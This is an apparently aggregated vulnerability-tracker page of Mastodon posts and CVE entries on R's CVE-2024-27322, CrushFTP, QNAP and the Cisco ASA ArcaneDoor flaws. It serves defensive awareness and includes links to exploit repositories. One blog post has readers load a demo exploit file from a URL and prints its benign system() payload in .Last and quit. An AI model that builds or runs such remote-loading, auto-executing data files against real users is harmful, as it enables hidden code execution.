Vulnerability in R Programming Language Enables Supply Chain Attacks securityweek.com/vulnerability @SecurityWeek

##

jbhall56 at 2024-04-30T11:38:38.725Z ##

The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. darkreading.com/application-se

##

hrbrmstr@mastodon.social at 2024-04-29T14:13:24.000Z ##

🚨Looks like #RStats was not immune to deserialization bugs after all hiddenlayer.com/research/r-bit

Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!

CVE-2024-27322

##

hrbrmstr@mastodon.social at 2024-05-03T10:36:57.000Z ##

I ended up having to burn time I honestly don't have this week to blog the stuff from the repo I made yesterday due to CERT and CISA making a big deal (cisa.gov/news-events/alerts/20) out of expected behavior in #RStats due to a daft, hype-seeking vendor.

The profession that is cybersecurity is stupid broken.

I rly want (someone) to pwn an org with this CVE just to get it on KEV for sad posterity.

rud.is/b/2024/05/03/cve-2024-2

##

hrbrmstr@rud.is at 2024-05-03T10:12:52.000Z ##

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------Loading R data file in quarantined environment…-----------------------------------------------Loading objects:  .Last  quit-----------------------------------------Enumerating objects in loaded R data file-----------------------------------------.Last : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> quit : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> ------------------------------------Functions found: enumerating sources------------------------------------Checking `.Last`…!! `.Last` may execute arbitrary code on your system under certain conditions !!`.Last` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}Checking `quit`…!! `quit` may execute arbitrary code on your system under certain conditions !!`quit` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0/

##

wviechtb@scholar.social at 2024-05-02T09:50:20.000Z ##

As has been making the rounds, R version 4.4.0 patched a security issue:

hiddenlayer.com/research/r-bit
kb.cert.org/vuls/id/238194
nvd.nist.gov/vuln/detail/CVE-2

However, as noted on R-help, the issue runs much deeper:

stat.ethz.ch/pipermail/r-help/

If I understand this correctly, avoiding external .rdata/.rds files from untrusted sources seems prudent.

#RStats

##

jbhall56@infosec.exchange at 2024-05-01T12:13:40.000Z ##

The vulnerability, tagged CVE-2024-27322, can be exploited by tricking someone into loading a maliciously crafted RDS (R Data Serialization) file into an R-based project, or by fooling them into integrating a poisoned R package into a code base. theregister.com/2024/05/01/r_p

##

sublimer@mstdn.sublimer.me at 2024-05-01T10:12:42.000Z ##

JVNVU#96606632: Rプログラミング言語の実装において、安全でないデータのデシリアライゼーションが発生する問題(CVE-2024-27322) : 👀
---
jvn.jp/vu/JVNVU96606632/

##

mplouffe@scholar.social at 2024-05-01T09:38:28.000Z ##

Update your Rs!

4.4.0 patched CVE-2024-27322, detailed below:

theregister.com/2024/05/01/r_p

#R #DataScience #Statistics #Econometrics #MoarHashtag

##

andi@sciences.social at 2024-05-01T07:00:32.000Z ##

A vulnerability (CVE-2024-27322) has been found in R versions 1.4.0 to 4.3.3. It's patched in 4.4.0 (24 April 2024), so you will be wanting to upgrade. #RStats
kb.cert.org/vuls/id/238194

##

klmr@mastodon.social at 2024-04-30T21:50:52.000Z ##

@hrbrmstr @joranelias @Lluis_Revilla @brodriguesco @idavydov Right, it’s as much “expected behaviour” as in CVE-2024-27322, and as in other serialisation engines (e.g. Python pickle, .net BinaryFormatter, etc.). Which are all systems that are very hard to use correctly, and cause frequent direct vulnerabilities. Whether that makes the serialisation frameworks themselves a vulnerability… 🤷

(I did not register a CVE; for me this is an issue of awareness and documentation.)

##

AAKL@infosec.exchange at 2024-04-30T13:38:49.000Z ##

CVE-2024-27322, if you missed this:. #cybersecurity #infosec

Vulnerability in R Programming Language Enables Supply Chain Attacks securityweek.com/vulnerability @SecurityWeek

##

jbhall56@infosec.exchange at 2024-04-30T11:38:38.000Z ##

The CVE-2024-27322 security vulnerability in R's deserialization process gives attackers a way to execute arbitrary code in target environments via specially crafted files. darkreading.com/application-se

##

hrbrmstr@mastodon.social at 2024-04-29T14:13:24.000Z ##

🚨Looks like #RStats was not immune to deserialization bugs after all hiddenlayer.com/research/r-bit

Watch those R Data files (and, we now shld come up with better ways to ensure local R library integrity)!!

CVE-2024-27322

##

CVE-2024-27956
(9.9 CRITICAL)

EPSS: 0.05%

updated 2024-04-29T09:31:52

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ValvePress Automatic allows SQL Injection.This issue affects Automatic: from n/a through 3.92.0.

Nuclei template

3 repos

https://github.com/truonghuuphuc/CVE-2024-27956

https://github.com/diego-tella/CVE-2024-27956-RCE

https://github.com/X-Projetion/CVE-2024-27956-WORDPRESS-RCE-PLUGIN

CVE-2024-27124
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-26T15:32:22.523000

2 posts

An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTS hero h4.5

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-32764
(9.9 CRITICAL)

EPSS: 0.04%

updated 2024-04-26T15:32:22.523000

2 posts

A missing authentication for critical function vulnerability has been reported to affect myQNAPcloud Link. If exploited, the vulnerability could allow users with the privilege level of some functionality via a network. We have already fixed the vulnerability in the following version: myQNAPcloud Link 2.4.51 and later

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-32766
(10.0 CRITICAL)

EPSS: 0.04%

updated 2024-04-26T15:30:39

2 posts

An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.3.2578 build 20231110 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTS hero h4.5

1 repos

https://github.com/3W1nd4r/CVE-2024-32766-RCE

screaminggoat at 2024-04-29T19:27:12.989Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

##

screaminggoat@infosec.exchange at 2024-04-29T19:27:12.000Z ##

QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)

  • CVE-2024-21899 (9.8 critical) improper authentication vulnerability could allow users to compromise the security of the system via a network
  • CVE-2024-21900 (6.5 medium) injection vulnerability could allow authenticated users to execute commands via a network
  • CVE-2024-21901 (4.7 medium) SQL injection vulnerability could allow authenticated administrators to inject malicious code via a network
  • CVE-2024-27124 (7.5 high) OS command injection vulnerability could allow users to execute commands via a network
  • CVE-2024-32764 (9.9 critical) missing authentication for critical function vulnerability could allow unprivileged users to gain access to and execute certain functions via a network
  • CVE-2024-32766 (10.0 critical 🥳) OS command injection vulnerability could allow users to execute commands via a network

QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.

#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766

##

CVE-2024-4040
(10.0 CRITICAL)

EPSS: 1.60%

updated 2024-04-26T15:25:47.270000

27 posts

A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

9 repos

https://github.com/Mohammaddvd/CVE-2024-4040

https://github.com/rbih-boulanouar/CVE-2024-4040

https://github.com/airbus-cert/CVE-2024-4040

https://github.com/gotr00t0day/CVE-2024-4040

https://github.com/Praison001/CVE-2024-4040-CrushFTP-server

https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability

https://github.com/tucommenceapousser/CVE-2024-4040-Scanner

https://github.com/Mufti22/CVE-2024-4040

https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC

jos1264@social.skynetcloud.site at 2024-04-26T19:30:04.000Z ##

CrushFTP VFS Sandbox Escape Vulnerability (CVE-2024-4040) fortiguard.fortinet.com/threat

##

catc0n at 2024-04-24T20:45:58.152Z ##

Rapid7 now has a full technical analysis of CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) attackerkb.com/topics/20oYjlmf

##

screaminggoat at 2024-04-24T17:35:09.592Z ##

While everyone's freaking out about Cisco, CISA added CrushFTP's actively exploited zero-day CVE-2024-4040 to the Known Exploited Vulnerabilities (KEV) Catalog: 🔗 cisa.gov/news-events/alerts/20

##

screaminggoat at 2024-04-23T22:34:37.392Z ##

@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb

##

h4sh at 2024-04-23T22:32:59.637Z ##

Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.

cve.org/CVERecord?id=CVE-2024-

> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

##

catc0n at 2024-04-23T15:43:34.634Z ##

Rapid7 researcher @fuzz analyzed CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. rapid7.com/blog/post/2024/04/2

##

screaminggoat at 2024-04-23T15:40:25.606Z ##

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 rapid7.com/blog/post/2024/04/2

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

##

h4sh at 2024-04-23T12:56:51.605Z ##

Exploit from airbus-cert is out for CVE-2024-4040

Expect more in the wild exploitation in the coming days.. infosec.exchange/@wvu/11232021

##

wvu at 2024-04-23T11:06:48.635Z ##

h/t @JohnHammond github.com/airbus-cert/CVE-202

##

jos1264@social.skynetcloud.site at 2024-04-23T10:15:03.000Z ##

CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) helpnetsecurity.com/2024/04/23 #CrowdStrike #enterprise #Don'tmiss #Hotstuff #CrushFTP #exploit #Censys #News #CVE #FTP

##

h4sh at 2024-04-23T00:54:13.064Z ##

Here's a template to detect potentially unpatched 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

##

screaminggoat at 2024-04-22T23:22:35.314Z ##

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: infosec.exchange/@h4sh/1123165

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

##

campuscodi@mastodon.social at 2024-04-22T23:14:42.000Z ##

The CrushFTP zero-day is now CVE-2024-4040

nvd.nist.gov/vuln/detail/CVE-2

##

screaminggoat at 2024-04-22T20:06:45.150Z ##

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). cve.org/CVERecord?id=CVE-2024-

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

##

h4sh at 2024-04-22T19:35:57.897Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

##

catc0n@infosec.exchange at 2024-04-24T20:45:58.000Z ##

Rapid7 now has a full technical analysis of #CrushFTP CVE-2024-4040 available in AttackerKB (with many thanks to @fuzz for the great work!) attackerkb.com/topics/20oYjlmf

##

screaminggoat@infosec.exchange at 2024-04-23T22:34:37.000Z ##

@h4sh I'm unfamiliar with the CVE process. NVD's information hasn't updated yet, which I assume eventually updates from cve.org. Do you know when NVD's information will reflect cve.org's? @todb

##

h4sh@infosec.exchange at 2024-04-23T22:32:59.000Z ##

Due to new information, CVE-2024-4040 is now an unauthenticated remote code execution via template injection (CVSS 9.8). Multiple sources of new information have confirmed this. The CVE record has been updated.

cve.org/CVERecord?id=CVE-2024-

> A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

##

catc0n@infosec.exchange at 2024-04-23T15:43:34.000Z ##

Rapid7 researcher @fuzz analyzed #CrushFTP CVE-2024-4040 and found that it's not only exploitable for arbitrary file read as root, but also authentication bypass for admin access and full RCE. Patch immediately. rapid7.com/blog/post/2024/04/2

##

screaminggoat@infosec.exchange at 2024-04-23T15:40:25.000Z ##

@h4sh Rapid7 has a much more severe analysis of CVE-2024-4040, the actively exploited CrushFTP zero-day. 🔗 rapid7.com/blog/post/2024/04/2

Rapid7’s vulnerability research team analyzed CVE-2024-4040 and determined that it is fully unauthenticated and trivially exploitable; successful exploitation allows for not only arbitrary file read as root, but also authentication bypass for administrator account access and full remote code execution. Successful exploitation allows a remote, unauthenticated attacker to access and potentially exfiltrate all files stored on the CrushFTP instance.

Although the vulnerability has been formally described as an arbitrary file read, Rapid7 believes that it can be more accurately categorized as a server-side template injection (SSTI).

#zeroday #vulnerability #CVE_2024_4040 #CrushFTP #eitw #activeexploitation

##

h4sh@infosec.exchange at 2024-04-23T12:56:51.000Z ##

Exploit from airbus-cert is out for #crushFTP CVE-2024-4040

Expect more in the wild exploitation in the coming days.. infosec.exchange/@wvu/11232021

##

wvu@infosec.exchange at 2024-04-23T11:06:48.000Z ##

h/t @JohnHammond github.com/airbus-cert/CVE-202

##

h4sh@infosec.exchange at 2024-04-23T00:54:13.000Z ##

Here's a #nuclei template to detect potentially unpatched #CrushFTP 10.x servers against CVE-2024-4040.

Note that the templates do NOT exploit the vuln and are not remotely related to a POC. Attackers will likely find these useless because they are.

github.com/directcyber/checker

#CVE20244040 #CVE_2024_4040

##

simontsui@infosec.exchange at 2024-04-22T23:22:35.000Z ##

@campuscodi Kudos to @h4sh for assigning the CVE to the actively exploited CrushFTP zero-day: infosec.exchange/@h4sh/1123165

According to his analysis and patch diffing, the CVSSv3 score for CVE-2024-4040 is 7.7 HIGH: Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Did some patch diffing on the new #crushFTP bug, and it does look like the bug has 2 components and at least one of them need some form of authentication to exploit (need creation of something).
After the first stage, the reading of the file outside of VFS sandbox might not need authentication. I am not sure.

#CrushFTP #zeroday #vulnerability #CVE_2024_4040 #eitw #activeexploitation

##

campuscodi@mastodon.social at 2024-04-22T23:14:42.000Z ##

The CrushFTP zero-day is now CVE-2024-4040

nvd.nist.gov/vuln/detail/CVE-2

##

simontsui@infosec.exchange at 2024-04-22T20:06:45.000Z ##

Shoutout to @h4sh for getting a CVE ID assigned to this actively exploited zero-day CrushFTP vulnerability: CVE-2024-4040 (reported by Simon Garrelou, of Airbus CERT). cve.org/CVERecord?id=CVE-2024-

VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

#zeroday #eitw #activeexploitation #CrushFTP #vulnerability #CVE_2024_4040

##

h4sh@infosec.exchange at 2024-04-22T19:35:57.000Z ##

I bring you CVE-2024-4040: VFS Sandbox Escape in #CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.

cve.org/CVERecord?id=CVE-2024-

If anyone disagrees with our CVSS analysis, please let me know & bring proof

#CVE20244040 #CVE_2024_4040

##

CVE-2024-20359
(6.0 MEDIUM)

EPSS: 0.13%

updated 2024-04-26T15:25:02.773000

54 posts

A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerabilit

2 repos

https://github.com/west-wind/Threat-Hunting-With-Splunk

https://github.com/Garvard-Agency/CVE-2024-20359-CiscoASA-FTD-exploit

screaminggoat at 2024-05-02T14:00:55.015Z ##

Censys: Analysis of ArcaneDoor Threat Infrastructure Suggests Potential Ties to Chinese-based Actor
After the Cisco zero-days from last week (CVE-2024-20353 which is 8.6 high, and CVE-2024-20359 at 6.0 medium, disclosed 24 April 2024 by Cisco as exploited zero-days), Censys investigated the actor-controlled IPs provided by Talos in Censys data and cross-referenced the with other certificate indicators. They discovered "compelling data" suggesting the potential involvement of a China-based actor, including links to multiple major Chinese networks and the presence of Chinese-developed anti-censorship software. Cisco didn't outright say China, but Censys has.

##

screaminggoat at 2024-04-26T20:16:17.085Z ##

The hubbub about Cisco is winding down, but in case you are handling an active security incident, Computer Incident Response Center Luxembourg (CIRCL) recommended users of Cisco ASA equipment follow the Cisco ASA Forensic Investigation Procedures for First Responders.
This document was created 19 August 2019 and revised 3 times (latest 25 January 2024) by the original author, so it is certainly reliable.

It outlines a number of commands that can be run to gather evidence for an investigation along with the respective output that should be collected upon running these commands. This document also provides information on how to perform integrity checks on an ASA’s system images, and includes a procedure for collecting a core file/memory dump from an ASA device.

##

deltatux@infosec.town at 2024-04-25T13:48:46.786Z ##

The Canadian Centre for Cyber Security has issued a detailed security advisory regarding the "LINE DANCER" & "LINE RUNNER" attacks against Cisco ASA devices by what it believes are nation-state sponsored malicious actors.

As usual, if you or your organization runs Cisco ASAs, time to patch to mitigate these vulnerabilities.

www.cyber.gc.ca/en/news-events/cyber-activity-impacting-cisco-asa-vpns

#infosec #cybersecurity #LINEDANCER #LINERUNNER #ARCANEDOOR #Cisco #CiscoASA #SecurityAdvisory #CVE_2024_20359 #CVE_2024_20353

##

mttaggart@infosec.town at 2024-04-25T07:32:55.969Z ##

Just a reminder that while we are up to 3 CVEs for the #Cisco #ArcaneDoor attack, we still don't know what the initial access to these devices was.

If I were a very strategic purchaser, I'd be thinking about what it would look like to replace any Cisco gear on my perimeter. Just in case.

blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/

#CVE_2024_20353 #CVE_2024_20358 #CVE_2024_20359

##

screaminggoat at 2024-04-25T02:52:31.608Z ##

Australian Cyber Security Centre (ACSC) of Australian Signals Directorate (ASD) issued a cybersecurity alert 🔗 Exploitation of vulnerabilities affecting Cisco firewall platforms. The important points are that they are aware of activity impacting Cisco ASA devices in Australia and can confirm that some Cisco ASA devices in Australia have been compromised. They refer to the jointly co-authored advisory hosted on CCCS's website: Cyber Activity Impacting CISCO ASA VPNs

##

avuko at 2024-04-24T20:59:17.602Z ##

So, if you think you've maybe got / issues on your ASA (discovery methods here: blog.talosintelligence.com/arc), first things first:

DO NOT REBOOT OR CRASH DUMP YOUR DEVICE (sorry for shouting)

"When following these procedures first responders should NOT attempt to collect a core dump (Step 5) or reboot the device if they believe that the device has been compromised, based on the lina memory region output."

This thing runs in (hard to reach) memory, and hooks smartly, so it will be gone and your collection will have failed.

What you should do is (I'll quote):

  1. Log in to the suspect device CLI. Note: On devices that are running Cisco FTD Software, change into the Cisco ASA CLI using the system support diagnostic-cli command.
  2. Use the enable command to change into privileged EXEC mode.Note: On devices that are running Cisco FTD Software, the enable password is blank.
  3. Collect the outputs of the following commands:
    • show version
    • verify /SHA-512 system:memory/text
    • debug menu memory 8
  4. Open a case with the Cisco Technical Assistance Center (TAC, cisco.com/c/en/us/support/inde). In the case, reference the keyword ArcaneDoor and upload the data that was collected in Step 3.

Secondly, although you should patch (after establishing you have not been compromised), the two patches mentioned won't protect you from the getting reinfected.

I will repeat (without shouting this time):

Patching is not a fix!

"We have not determined the initial access vector used in this campaign. We have not identified evidence of pre-authentication exploitation to date."

There did pop up a third CVE () in between the Talos publication and the CISCO advisory page (sec.cloudapps.cisco.com/securi), but it is also local (not "network"), so I guess that won't safe anyone from reinfection either. But that's just me guessing.

Final question for anyone still reading: why the debug menu memory 8? What does it do?

##

screaminggoat at 2024-04-24T19:27:17.460Z ##

I take back everything bad I said about NCSC-UK yesterday. They released lengthy malware analysis reports on both malware:

cc: @todb @campuscodi @mttaggart @DaveMWilburn

##

screaminggoat at 2024-04-24T19:16:42.383Z ##

The Canadian Centre for Cyber Security CCCS has a security advisory for the Cisco zero-days and exploitation. It includes backgrounddetails from CCCS's perspective, artifact information about the LINE RUNNER and LINE DANCER malware, indicators of compromise, and recommanded actions: 🔗
cyber.gc.ca/en/news-events/cyb

##

mttaggart@infosec.town at 2024-04-24T17:57:29.306Z ##

The #Cisco vulns today smack a little of the Barracuda ones last year.

I really hope we don't end at "Toss these ASAs into a volcano."

#CVE_2024_20353 #CVE_2024_20359

##

screaminggoat at 2024-04-24T16:53:30.823Z ##

@todb @briankrebs @campuscodi @jwarminsky @jgreig @mttaggart

HOT OFF THE PRESS!! CISA adds CVE-2024-202353 and CVE-2024-202359 to the Known Exploited Vulnerabilities (KEV) Catalog. 🔗 cisa.gov/news-events/alerts/20

See original toot above for information on the Cisco exploited zero-days.

##

